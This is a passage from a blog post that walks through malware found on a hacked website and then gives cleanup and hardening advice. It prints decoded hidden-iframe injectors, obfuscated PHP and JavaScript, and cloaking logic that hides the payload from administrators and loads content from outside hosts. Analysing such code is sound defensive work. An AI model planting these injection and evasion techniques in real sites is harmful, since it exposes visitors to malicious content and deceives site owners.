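H_LEGACY = -legacy_parse_int("012") / 5    # -2.0, what the sample relied on
H_MODERN = -int("012") / 5                 # -2.4, what a current engine computes

if __name__ == "__main__":
    print(repr(decode(NUMBERS, H_LEGACY)))
    print(repr(decode(NUMBERS, H_MODERN)))
```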

which in turn adds a hidden iframe to the pages on the site...

if (document.getElementsByTagName('body')[0]){
  iframer();
} else {
  document.write("<iframe src='hxxp://motivemus.mooo.com/showthread.php?t=45122773' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer(){
  var f = document.createElement('iframe');
  f.setAttribute('src', 'hxxp://motivemus.mooo.com/showthread.php?t=45122773');
  f.style.visibility = 'hidden';
  f.style.position = 'absolute';
  f.style.left = '0';
  f.style.top = '0';
  f.setAttribute('width', '10');
  f.setAttribute('height', '10');
  document.getElementsByTagName('body')[0].appendChild(f);
}

This is another example of an obfuscated script used to insert an iframe, but here the PHP is "double" encoded...

eval(gzinflate(base64_decode('...')));

When we plug that long string of characters into a decoder we get...

if (!isset($frmDs)){
  global $frmDs;
  $frmDs = 1;
  $ua = $_SERVER['HTTP_USER_AGENT'];
  if (strpos($ua, 'Windows')!==false&&strpos($ua,'MSIE')!==false){
    error_reporting(0);
    if(strpos(strtolower(@$_SERVER["HTTP_COOKIE"].';'.$_SERVER['REQUEST_URI']),'admin')!==false)$isadm=1;
    if(isset($isadm)||!isset($_COOKIE['__utmfr']))@setcookie('__utmfr',rand(1,1000),time()+86400*(($isadm)?365:7),'/');
    if(!isset($isadm)&&!isset($_COOKIE['__utmfr']))print('...');
  }
}

Three things are worth noticing here: it only fires for Windows users on Internet Explorer, it sets a __utmfr cookie (named to look like a Google Analytics cookie) so that each victim gets the payload only once a week, and if the word 'admin' appears anywhere in the cookies or the request URI it sets that cookie for a year and prints nothing, so a logged-in administrator never sees the injected content.

While it is starting to be a little more readable, we still have another long base64 encoded string in the print() call. Plugging that into the decoder again, we can now see the JavaScript that is appearing in the pages of the site...

try{document.body--}catch(gdsgd){ww=window;v="v"+"al";if(ww.document)try{document.body=12;}catch(gdsgsdg){asd=0;try{q=document.createElement("div");}catch(q){asd=1;}if(!asd){w={a:ww}.a;v="e".concat(v);}}e=w[v];if(1){f=new Array(...)} w=f;s=[];for(i=0;-i+709!=0;i+=1){j=i;if((031==0x19))if(e)s=s+String.fromCharCode((1*w[j]+e("j%4")));}xz=e;xz(s)}

A "de-obfuscation" of the JavaScript, and the purpose of the code now becomes clear...

function gra(a, b){return Math.floor(Math.random() * (b - a + 1)) + a;}
function rs(){return Math.random().toString(36).substring(5);}
if (navigator.cookieEnabled){
  var stnm = rs();
  var ua = navigator.userAgent;
  if (ua.indexOf('Windows') != -1 && ua.indexOf('MSIE') != -1){
    document.write('<style>.s' + stnm + ' { position:absolute; left:-' + gra(600, 1000) + 'px; top:-' + gra(600, 1000) + 'px; }</style> <div class="s' + stnm + '"><iframe src="hxxp://leenhjxsy.myfw.us/ad/feed.php" width="' + gra(300, 600) + '" height="' + gra(300, 600) + '"></iframe></div>');
  }
  var exp = new Date();
  exp.setDate(exp.getDate() + 7);
  if (document.cookie.indexOf('__utmfr=') == -1){
    document.cookie = '__utmfr=' + rs() + '; expires=' + exp.toGMTString() + '; path=/';
  }
}

When the JavaScript is executed by the user's browser, we get an iframe positioned far off-screen (random class name and offsets, so no two copies look alike) loading malicious content from another site...

<style>.sot719io4 { position:absolute; left:-806px; top:-869px; }</style> <div class="sot719io4"> <iframe src="hxxp://leenhjxsy.myfw.us/ad/feed.php" width="564" height="303"></iframe></div>

Always follow up with some basic security checks!

Figuring out how the rats are getting into the barn is always tough (my apologies to rats for the comparison). Most hosting providers can help by checking access logs, looking at file ownership and modification times, etc., so ask your hosting provider for any information they can give you.

What I often see is hackers exploiting vulnerabilities in older versions of software. Make sure all your software (CMS, themes and plugins) is up to date.

Compromised Passwords:

Start by scanning your PC and make sure there is no malware capturing your IDs and passwords. Change ALL your passwords, especially the FTP ones. Never store passwords in your FTP client, and use SFTP if it is available. On WordPress sites, you need to change your security/secret keys (the salts in wp-config.php) as well; that invalidates every existing login cookie, including any the hacker is holding.

File/Folder Permissions:

Hackers abuse loose file permissions to keep access to your server even after you change your passwords, so check the permissions strictly. I usually set files to 644 and folders to 755.

Backdoors:

A backdoor is usually a PHP file hidden away somewhere among the system files; '/cgi-bin/' is a popular place. This PHP file is not part of your site and will contain a pile of base64 encoded junk. You will see lines of PHP that start with eval(base64_decode(' or eval(gzinflate(base64_decode(' or eval(gzuncompress(base64_decode(' followed by a long string of seemingly random characters. I wrote an article with some tips on how to locate a backdoor on a site...

Hope this helps, let's nuke those hackers... 🤘🏻


About Syed

Syed Shariefi. Game Developer. Musician. Entrepreneur. Reader. Certified Problem Solver. Troublemaker. Evil Analyst. Movie Fanatic. Pro Gamer. Software Engineer.

Syed Shariefi (Shuvo) © 2022. All rights reserved...